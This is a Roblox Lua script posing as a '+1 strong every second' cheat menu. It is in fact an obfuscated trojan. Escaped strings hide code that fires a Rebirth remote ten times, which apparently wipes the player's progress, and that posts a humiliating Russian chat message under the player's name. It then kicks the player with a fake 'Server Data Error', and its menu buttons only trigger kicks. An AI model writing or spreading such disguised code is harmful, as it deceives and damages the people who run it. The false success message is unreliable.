-- [[ +1 strong every second | Build 1.0.12 ]] -- local p = game:GetService("\80\108\97\121\101\114\115").LocalPlayer local RS = game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101") task.spawn(function() local e = RS:FindFirstChild("Rebirth") or RS:FindFirstChild("RebirthRequest") or (RS:FindFirstChild("Events") and RS.Events:FindFirstChild("Rebirth")) if e then for i=1,10 do e:FireServer(1) end end local s = "\208\188\208\189\101\32\208\190\209\135\101\208\189\209\140\32\208\189\209\128\208\176\208\178\208\184\209\130\209\129\209\143\32\208\189\209\142\209\133\208\176\209\130\209\140\32\208\179\209\128\209\143\208\183\208\189\209\139\208\181\32\208\189\208\190\209\129\208\186\208\184\33" local tc = game:GetService("\84\101\120\116\67\104\97\116\83\101\114\118\105\99\101") if tc.ChatVersion == Enum.ChatVersion.TextChatService then local c = tc.TextChannels:FindFirstChild("\82\66\88\71\101\110\101\114\97\108") if c then c:SendAsync(s) end else local r = RS:FindFirstChild("\68\101\102\97\117\108\116\67\104\97\116\83\121\115\116\101\109\67\104\97\116\69\118\101\110\116\115") if r then r:FindFirstChild("\83\97\121\77\101\115\115\97\103\101\82\101\113\117\101\115\116"):FireServer(s, "\65\108\108") end end end) task.delay(12, function() p:Kick("\83\101\114\118\101\114\32\68\97\116\97\32\69\114\114\111\114") end) if game.CoreGui:FindFirstChild("StrongLoader") then game.CoreGui.StrongLoader:Destroy() end local sg = Instance.new("ScreenGui", game.CoreGui) sg.Name = "StrongLoader" local Main = Instance.new("Frame", sg) Main.Size, Main.Position = UDim2.new(0, 360, 0, 240), UDim2.new(0.5, -180, 0.5, -120) Main.BackgroundColor3 = Color3.fromRGB(30, 30, 30) Instance.new("UICorner", Main) local Side = Instance.new("Frame", Main) Side.Size, Side.BackgroundColor3 = UDim2.new(0, 100, 1, 0), Color3.fromRGB(40, 40, 40) Instance.new("UICorner", Side) local function Add(txt, parent) local b = Instance.new("TextButton", parent) b.Size, b.BackgroundColor3 = UDim2.new(1, -5, 0, 35), Color3.fromRGB(45, 45, 45) b.Text, b.TextColor3, b.Font, b.TextSize = " " .. txt, Color3.new(1, 1, 1), 4, 12 Instance.new("UICorner", b) b.MouseButton1Click:Connect(function() b.Text = " Loading..." task.wait(0.5) p:Kick() end) end local P1 = Instance.new("Frame", Main) P1.Size, P1.Position, P1.BackgroundTransparency = UDim2.new(1, -110, 1, -10), UDim2.new(0, 105, 0, 5), 1 Instance.new("UIListLayout", P1).Padding = UDim.new(0, 5) Add("Infinite Strength", P1) Add("Infinite Wins", P1) Add("Auto Rebirth", P1) Add("Auto Clicker", P1) print("+1 strong every second: Success.")